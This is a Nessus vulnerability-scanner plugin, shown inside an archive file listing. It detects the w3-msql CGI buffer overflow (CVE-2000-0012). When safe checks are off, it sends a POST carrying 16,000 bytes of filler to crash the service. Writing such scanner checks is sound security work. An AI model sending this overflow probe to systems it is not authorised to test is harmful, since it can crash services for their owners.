home *** CD-ROM | disk | FTP | other *** search
/ Chip 2007 January, February, March & April / Chip-Cover-CD-2007-02.iso / Pakiet bezpieczenstwa / mini Pentoo LiveCD 2006.1 / mpentoo-2006.1.iso / modules / nessus-2.2.8.mo / usr / lib / nessus / plugins / w3msql_overflow.nasl < prev    next >
Text File  |  2005-01-14  |  3KB  |  140 lines

  1. #
  2. # This script was written by Renaud Deraison <deraison@cvs.nessus.org>
  3. #
  4. # See the Nessus Scripts License for details
  5. #
  6.  
  7. if(description)
  8. {
  9.  script_id(10296);
  10.  script_bugtraq_id(898);
  11.  script_version ("$Revision: 1.22 $");
  12.  script_cve_id("CVE-2000-0012");
  13.  
  14.  name["english"] = "w3-msql overflow";
  15.  name["francais"] = "DΘpassement de buffer dans w3-msql";
  16.  script_name(english:name["english"], francais:name["francais"]);
  17.  
  18.  desc["english"] = "
  19. The mini-sql program comes with the w3-msql CGI which is vulnerable 
  20. to a buffer overflow.
  21.  
  22. An attacker may use it to gain a shell on this system.
  23.  
  24. Solution : contact the vendor of mini-sql (http://www.hugues.com.au)
  25.            and ask for a patch. Meanwhile, remove w3-msql from
  26.        /cgi-bin
  27.        
  28. Risk factor : High";
  29.  
  30.  
  31.  desc["francais"] = "
  32. Le programme mini-sql est installΘ avec le CGI 
  33. w3-msql qui est vulnΘrable α un dΘpassement de buffer.
  34.  
  35. Un pirate peut utiliser ce problΦme pour obtenir
  36. un shell sur ce systΦme.
  37.  
  38. Solution : contactez le vendeur de mini-sql (http://hugues.com.au)
  39.        et demandez un patch. Pendant ce temps, retirez w3-msql
  40.        de /cgi-bin
  41.        
  42. Facteur de risque : ElevΘ";
  43.  
  44.  
  45.  script_description(english:desc["english"], francais:desc["francais"]);
  46.  
  47.  summary["english"] = "Overflow in w3-msql";
  48.  summary["francais"] = "Overflow dans w3-msql";
  49.  
  50.  script_summary(english:summary["english"], francais:summary["francais"]);
  51.  
  52.  script_category(ACT_MIXED_ATTACK); # mixed
  53.  
  54.  
  55.  script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison",
  56.         francais:"Ce script est Copyright (C) 1999 Renaud Deraison");
  57.  family["english"] = "CGI abuses";
  58.  family["francais"] = "Abus de CGI";
  59.  script_family(english:family["english"], francais:family["francais"]);
  60.  script_dependencie("find_service.nes", "no404.nasl");
  61.  script_require_ports("Services/www", 80);
  62.  exit(0);
  63. }
  64.  
  65. #
  66. # The script code starts here
  67. #
  68.  
  69. include("http_func.inc");
  70. include("http_keepalive.inc");
  71.  
  72.  
  73. port = get_http_port(default:80);
  74.  
  75. if(!get_port_state(port))exit(0);
  76.  
  77. flag = 0;
  78. cgi = "w3-msql/index.html";
  79.  
  80. foreach dir (cgi_dirs())
  81. {
  82.  if(is_cgi_installed_ka(port:port, item:string(dir, "/", cgi)))
  83.  {
  84.   flag = 1;
  85.   directory = dir;
  86.   break;
  87.  }
  88. }
  89.  
  90. if(!flag)exit(0);
  91.  
  92.  
  93. if(safe_checks())
  94. {
  95.  data =  "
  96. Some versions of the mini-sql program comes with a
  97. w3-msql CGI which is vulnerable to a buffer overflow.
  98.  
  99. An attacker may use it to gain a shell on this system.
  100.  
  101. *** Nessus reports this vulnerability using only
  102. *** information that was gathered. Use caution
  103. *** when testing without safe checks enabled.
  104.  
  105. Solution : contact the vendor of mini-sql (http://hugues.com.au)
  106.            and ask for a patch. Meanwhile, remove w3-msql from
  107.        /cgi-bin
  108.        
  109. Risk factor : High";
  110.  
  111.   security_hole(port:port, data:data);
  112.  exit(0);
  113. }
  114.  
  115.  
  116.  
  117. s = "POST " + directory + "/w3-msql/index.html HTTP/1.0\r\n" +
  118.      "Connection: Keep-Alive\r\n" +
  119.      "User-Agent: Nessus\r\n" + 
  120.      "Host: "+get_host_name()+"\r\n"+
  121.      "Accept: image/gif, image/x-xbitmap, */*\r\n" +
  122.      "Accept-Language: en\r\n" +
  123.      "Content-type: multipart/form-data\r\n" + 
  124.      "Content-length: 16000\r\n";
  125. s2 = crap(16000);
  126. s3 = s+s2;
  127. s3 = string(s3);
  128. s3 = s3 + string("\r\n\r\n");
  129. soc = open_sock_tcp(port);
  130. if(soc)
  131. {
  132.     send(socket:soc, data:s3);
  133.     b = http_recv(socket:soc);
  134.     if(!b)security_hole(port);
  135.     close(soc); 
  136. }
  137.  
  138.  
  139.  
  140.